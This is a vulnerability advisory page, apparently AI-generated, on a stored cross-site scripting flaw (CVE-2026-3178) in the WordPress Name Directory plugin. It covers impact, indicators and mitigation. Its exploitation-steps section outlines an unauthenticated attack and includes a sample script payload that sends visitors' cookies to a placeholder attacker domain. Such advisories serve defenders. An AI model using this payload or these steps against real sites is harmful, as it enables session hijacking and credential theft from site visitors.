CVE-2026-3178: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-3178 is a Stored Cross-Site Scripting (XSS) vulnerability in the Name Directory plugin for WordPress, affecting all versions up to and including 1.32.1. The flaw exists in the name_directory_name parameter due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts that execute when any user visits an affected page. The vulnerability was disclosed on March 11, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (Wordfence, RedHat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The name_directory_name parameter in the plugin's admin interface fails to properly sanitize user-supplied input before storing it in the database and fails to escape it on output, enabling persistent script injection. Because no authentication is required to trigger the vulnerable code path, any remote attacker can submit a crafted payload that is subsequently rendered in the browser of any visitor to the affected page. Relevant source code locations include admin.php lines 930–931 and helpers.php line 602 in the plugin's repository (Wordfence, Plugin Trac).

Impact

Successful exploitation allows unauthenticated attackers to persistently inject malicious JavaScript into WordPress pages served to all site visitors, impacting both confidentiality and integrity. Injected scripts can be used to steal session cookies, redirect users to phishing sites, harvest credentials, or perform actions on behalf of authenticated users (including administrators). While availability is not directly impacted, a compromised administrator session could lead to full site takeover and further lateral movement within the hosting environment (Wordfence, RedHat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported as of the time of this report. The EPSS score is approximately 0.07%, indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the unauthenticated nature of the attack vector significantly lowers the barrier for exploitation, making it accessible to low-skilled attackers (Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Name Directory plugin (versions ≤ 1.32.1) using tools like WPScan, Shodan, or by checking publicly accessible plugin metadata at wp-content/plugins/name-directory/.
  2. Craft malicious payload: Prepare a stored XSS payload, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected via the name_directory_name parameter.
  3. Submit the payload: Send an unauthenticated HTTP POST request to the plugin's endpoint that processes the name_directory_name parameter, embedding the malicious script in the field value.
  4. Payload persistence: The injected script is stored in the WordPress database without proper sanitization.
  5. Trigger execution: When any user (including administrators) visits a page rendering the Name Directory content, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence, Plugin Trac).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from site visitors' browsers to unknown external domains (e.g., attacker-controlled cookie-harvesting endpoints); unusual POST requests to Name Directory plugin endpoints containing HTML/JavaScript tags in the name_directory_name parameter.
  • Logs: WordPress access logs showing POST requests to Name Directory admin or public endpoints with encoded script tags (<script>, %3Cscript%3E, javascript:) in parameter values.
  • Database: WordPress database entries in Name Directory tables containing raw HTML or JavaScript in the name fields rather than plain text.
  • File System: Unexpected modifications to plugin files in wp-content/plugins/name-directory/ that may indicate secondary compromise following session hijacking.

Mitigation and workarounds

The vulnerability was partially patched in versions 1.30.3 and 1.32.1, but these patches are noted as incomplete. Site administrators should update the Name Directory plugin to the latest available version beyond 1.32.1 once a fully patched release is available, and monitor the plugin's changelog for a complete fix (Plugin Changeset). As an interim workaround, consider disabling the Name Directory plugin until a complete patch is confirmed, or restrict access to the plugin's input forms using a Web Application Firewall (WAF) rule that blocks script injection patterns in the name_directory_name parameter. Wordfence users benefit from built-in firewall rules that may block exploitation attempts (Wordfence).

Community reactions

The vulnerability was reported and assigned by Wordfence, which included it in their weekly WordPress vulnerability report for March 9–15, 2026 (Wordfence Blog). Security aggregators including RedPacket Security and INCIBE-CERT published alerts shortly after disclosure. Community reaction has been limited, consistent with the moderate severity and niche plugin scope.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management